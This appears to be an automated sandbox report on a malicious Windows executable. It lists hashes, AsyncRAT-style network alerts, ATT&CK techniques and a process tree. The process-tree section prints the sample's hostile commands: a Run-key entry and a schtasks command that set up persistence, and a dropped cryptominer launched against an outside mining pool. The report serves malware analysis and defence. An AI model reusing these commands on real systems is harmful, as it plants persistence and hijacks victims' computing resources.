e54ccfd9a2ab15b4461eb38baec21eb828f7757ca3e67db3b7acb261be34adcd

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-05-2022 22:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ff72b295ded9889cee24320db368bcf1.exe
Size

809KB
MD5

ff72b295ded9889cee24320db368bcf1
SHA1

5d7991f8495d56088710dd558faba639ffd05292
SHA256

e54ccfd9a2ab15b4461eb38baec21eb828f7757ca3e67db3b7acb261be34adcd
SHA512

37ab209741e90c78565d170ab48d7ee83c8633e93e646a4c8f639c305c8b6528841668b6aa7797870612d24e11e1ff1aaae0f5622e9a2195957f9142e93a7b1b

Score

10^/10

persistence suricata

Malware Config

Signatures

suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata

Executes dropped EXE 2 IoCs

pid	Process
4452	IFMb39aGmCsqJcthXwNQEToq7.exe
5688	WlaOrzbfdk.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WlaOrzbfdk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WlaOrzbfdk.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	ff72b295ded9889cee24320db368bcf1.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TxMT8hHkO8fBB5FlBurdwljpn = "C:\\ProgramData\\4vFAHkNczECIXuLdvBZKuXofw\\IFMb39aGmCsqJcthXwNQEToq7.exe"	ff72b295ded9889cee24320db368bcf1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
960	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3948	timeout.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4452	IFMb39aGmCsqJcthXwNQEToq7.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe
3936	ff72b295ded9889cee24320db368bcf1.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3936	ff72b295ded9889cee24320db368bcf1.exe
Token: SeDebugPrivilege	3936	ff72b295ded9889cee24320db368bcf1.exe
Token: SeDebugPrivilege	4452	IFMb39aGmCsqJcthXwNQEToq7.exe
Token: SeDebugPrivilege	4452	IFMb39aGmCsqJcthXwNQEToq7.exe
Token: SeLockMemoryPrivilege	5688	WlaOrzbfdk.exe
Token: SeLockMemoryPrivilege	5688	WlaOrzbfdk.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5688	WlaOrzbfdk.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3936 wrote to memory of 960	3936	ff72b295ded9889cee24320db368bcf1.exe	82
PID 3936 wrote to memory of 960	3936	ff72b295ded9889cee24320db368bcf1.exe	82
PID 3936 wrote to memory of 4452	3936	ff72b295ded9889cee24320db368bcf1.exe	87
PID 3936 wrote to memory of 4452	3936	ff72b295ded9889cee24320db368bcf1.exe	87
PID 3936 wrote to memory of 4528	3936	ff72b295ded9889cee24320db368bcf1.exe	88
PID 3936 wrote to memory of 4528	3936	ff72b295ded9889cee24320db368bcf1.exe	88
PID 4528 wrote to memory of 3948	4528	cmd.exe	90
PID 4528 wrote to memory of 3948	4528	cmd.exe	90
PID 4452 wrote to memory of 5688	4452	IFMb39aGmCsqJcthXwNQEToq7.exe	94
PID 4452 wrote to memory of 5688	4452	IFMb39aGmCsqJcthXwNQEToq7.exe	94

C:\Users\Admin\AppData\Local\Temp\ff72b295ded9889cee24320db368bcf1.exe
"C:\Users\Admin\AppData\Local\Temp\ff72b295ded9889cee24320db368bcf1.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3936
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks.exe" /create /tn TxMT8hHkO8fBB5FlBurdwljpn /tr "C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe" /st 00:18 /du 23:59 /sc daily /ri 1 /f
  2⤵
  - Creates scheduled task(s)
  PID:960
- C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe
  "C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\ProgramData\8125412A8A\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe
    "C:\ProgramData\8125412A8A\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe" --url xmr.hashcity.org:4444 --user first1805.8125412A8A --pass x --title Service --cpu-max-threads-hint=70 --donate-level 0
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB451.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Windows\system32\timeout.exe
    timeout 6
    3⤵
    - Delays execution with timeout.exe
    PID:3948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
630.7MB

MD5
50f0762d1939c14671f94d0420504dc1

SHA1
854765a27c5ca15f5b463a856ee241817342a1ce

SHA256
bacb2ed202d91d545a096948c1d143cc64b50806a1d7a5b32107f7cb81c68a16

SHA512
fa59ddb177ec70ce1e0fea141ed6c3e5368a3f4e72284b766e8085c07fda0d7a398c9411933ac93ec921af59ddfbb3440e72737b175e580d25cb35da2090caa6

Download Submit
C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
628.2MB

MD5
ffd7319aa5900137c64425eda79a58e8

SHA1
bbcf4d1488fedbdc734e6d15374a9337ab1653d3

SHA256
bd72e0194be0ffdef3927d1220372ec9f4211cc32a12e1bd1bebbd9128b44ad0

SHA512
6d9ae6a03a80d8acf1da4bde9dd01b3a818a6cb062818c6f4a0e463379df17fc9c98113d2b8f449f48fe87bd26fe1e1b7141a0cd6e3bb35a59d63bffc4d665d1

Download Submit
C:\ProgramData\8125412A8A\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe

Filesize
53.9MB

MD5
4ee5964693705118d23b933d7ab9a507

SHA1
36ca0af62be8210b715c651337e98becaead0f55

SHA256
81468e24d95d12e9e7193624a26ae081c6ebeeaf6ebfef4201ae22dda7ccccb7

SHA512
66a9f55c0c2e1b8195adb465242bb81b4ef858c4569d43cbe1c4a5112a00b5407441e56bb4becb9f20b603182bb136ddff8fdeb8c957a2148f1172f723c952ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB451.tmp.bat

Filesize
184B

MD5
506e79a9d86659addcb501a11687b767

SHA1
e09a781e229f48a4a7723daf8ef6237066affb43

SHA256
8e47bda20aaea2f43fe8b7d692f59998a0e1e4581042ab093dab8cbd5daa267e

SHA512
f4e591f2259aa1f2cde794868e18778476bbdec3f6dbfd575d78a9209256e55a3f018ab8086f05311b230cc870aa8491085ae21049240fb09bab95c609f45231

Download Submit
memory/3936-130-0x00000000001B0000-0x000000000027E000-memory.dmp

Filesize
824KB

Download
memory/3936-131-0x00007FFB110A0000-0x00007FFB11B61000-memory.dmp

Filesize
10.8MB

Download
memory/4452-137-0x00007FFB110A0000-0x00007FFB11B61000-memory.dmp

Filesize
10.8MB

Download
memory/4452-140-0x000000001C76A000-0x000000001C76F000-memory.dmp

Filesize
20KB

Download
memory/4452-141-0x000000002CF30000-0x000000002CF34000-memory.dmp

Filesize
16KB

Download
memory/4452-142-0x000000002CF34000-0x000000002CF37000-memory.dmp

Filesize
12KB

Download
memory/5688-145-0x0000000001AD0000-0x0000000001AF0000-memory.dmp

Filesize
128KB

Download
memory/5688-146-0x00007FFB2ECD0000-0x00007FFB2EEC5000-memory.dmp

Filesize
2.0MB

Download
memory/5688-147-0x0000000006790000-0x00000000067D0000-memory.dmp

Filesize
256KB

Download